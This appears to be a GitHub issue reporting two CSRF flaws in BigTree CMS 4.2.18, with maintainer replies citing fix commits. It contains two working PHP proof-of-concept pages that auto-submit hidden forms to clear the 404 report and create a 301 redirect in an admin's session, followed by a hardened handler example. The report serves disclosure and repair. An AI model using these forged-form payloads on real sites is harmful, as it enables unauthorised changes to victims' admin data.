Multiple security issues of CSRF exist in BigTree CMS less than 4.2.18
One: with the `clear` parameter to \BigTree-CMS-4.2.18\core\admin\modules\dashboard\vitals-statistics\404\clear.php. PoC:

```php
<?php
// PoC 1: an auto-submitting cross-site form that POSTs clear=Clear+404s to the
// BigTree 404 clear endpoint; the victim's browser attaches its admin session cookie.
$s = "<form method='post' action='http://www.victim.com/BigTree-CMS-4.2.18/site/index.php/admin/dashboard/vitals-statistics/404/clear/'>";
$s .= "<input type='text' value='Clear+404s' name='clear' style='display:none!important;display:block;width:0;height:0' />";
$s .= "</form>";
$s .= "<script>document.forms[0].submit();</script>";
echo $s;
```

Request http://www.attack.com/poc1.php, then you will clear the 404 report.
Two: with the `from` and `to` parameters to \BigTree-CMS-4.2.18\core\admin\modules\dashboard\vitals-statistics\404\create-301.php. PoC:

```php
<?php
// PoC 2: the same auto-submitting form, this time POSTing from/to to the
// create-301 endpoint so a redirect is created in the victim's session.
$s = "<form method='post' action='http://www.victim.com/BigTree-CMS-4.2.18/site/index.php/admin/dashboard/vitals-statistics/404/create-301/'>";
$s .= "<input type='text' value='111111' name='from' style='display:none!important;display:block;width:0;height:0' />";
$s .= "<input type='text' value='222222' name='to' style='display:none!important;display:block;width:0;height:0' />";
$s .= "</form>";
$s .= "<script>document.forms[0].submit();</script>";
echo $s;
```

Request http://www.attack.com/poc2.php, then you will create one 301 redirect.
Repair: there is also no control of user rights, any user can do these operations, so you may use the verifyCSRFToken() and requireLevel(1) functions.
Thank you!
email:xfkxfk@secbook.com
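The fix the report asks for is a permission check and a CSRF token check in front of both handlers. The following is an added, stand-alone illustration of that pattern and is not BigTree's own code: it shows a minimal clear.php-style handler in the vulnerable shape the report describes and in a hardened shape, with the same gate applying unchanged to create-301.php. The `$_SESSION['level']` key, the `_csrf` field name and the `csrf_token`/`verify_csrf_token`/`has_level` helpers are assumptions for the example; in BigTree the reporter's suggested `verifyCSRFToken()` and `requireLevel(1)` play the same roles.

```php
<?php
// Added example, not BigTree's own code: the gate the report asks for
// (permission check + CSRF token check) in front of a state-changing admin
// action such as clearing the 404 report. Assumptions for the example:
// PHP sessions are in use, the logged-in user's level is kept in
// $session['level'], and the handler receives the decoded POST body.
declare(strict_types=1);

const CSRF_FIELD = '_csrf';

// Issue one token per session and reuse it, so every admin form can embed it.
function csrf_token(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// A page on attack.com cannot read the victim's session, so it cannot forge
// this value. hash_equals() keeps the comparison constant-time.
function verify_csrf_token(array $session, $submitted): bool
{
    $expected = $session['csrf_token'] ?? '';
    return is_string($submitted) && $expected !== ''
        && hash_equals($expected, $submitted);
}

// True when the session user meets the required level (the report suggests
// BigTree's requireLevel(1) for the same purpose).
function has_level(array $session, int $level): bool
{
    return (int)($session['level'] ?? -1) >= $level;
}

// Vulnerable shape, as the report describes it: any POST carrying `clear`
// wipes the report, whoever sent it and wherever the form lived.
function clear_404s_vulnerable(array $post, array &$report404): int
{
    if (isset($post['clear'])) {
        $report404 = [];
    }
    return 200;
}

// Hardened shape: refuse before touching state. Returns the HTTP status the
// caller should send.
function clear_404s_hardened(array $post, array $session, array &$report404): int
{
    if (!has_level($session, 1)) {
        return 403;                       // not an administrator
    }
    if (!verify_csrf_token($session, $post[CSRF_FIELD] ?? null)) {
        return 403;                       // missing or wrong token
    }
    if (isset($post['clear'])) {
        $report404 = [];
    }
    return 200;
}

// Legitimate form: the token travels in a hidden field alongside `clear`.
function render_clear_form(array &$session, string $action): string
{
    $token  = htmlspecialchars(csrf_token($session), ENT_QUOTES, 'UTF-8');
    $action = htmlspecialchars($action, ENT_QUOTES, 'UTF-8');
    return "<form method='post' action='{$action}'>"
         . "<input type='hidden' name='" . CSRF_FIELD . "' value='{$token}' />"
         . "<button type='submit' name='clear' value='Clear 404s'>Clear 404s</button>"
         . "</form>";
}

// Demo with a constructed session and a constructed 404 report (run from the CLI).
$session   = ['level' => 1];
$report404 = ['/old-page' => 7, '/missing.css' => 3];
$forged    = ['clear' => 'Clear+404s'];        // the fields poc1.php submits

$status = clear_404s_hardened($forged, $session, $report404);
echo "forged POST -> {$status}, rows left: " . count($report404) . "\n";

$genuine = ['clear' => 'Clear 404s', CSRF_FIELD => csrf_token($session)];
$status = clear_404s_hardened($genuine, $session, $report404);
echo "genuine POST -> {$status}, rows left: " . count($report404) . "\n";
```

The order of the checks matters: the level check runs first so an anonymous or low-level session never reaches the token comparison, and both checks run before any state is touched. The forged request from poc1.php carries the victim's cookie but no token, so it is rejected; the genuine form embeds the session token and succeeds.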
Fixed a CSRF opportunity. Thanks xfkxfk!
ce1e965
#287
Fixed another CSRF vector.
8b21324
Fixed in the two above commits, thanks!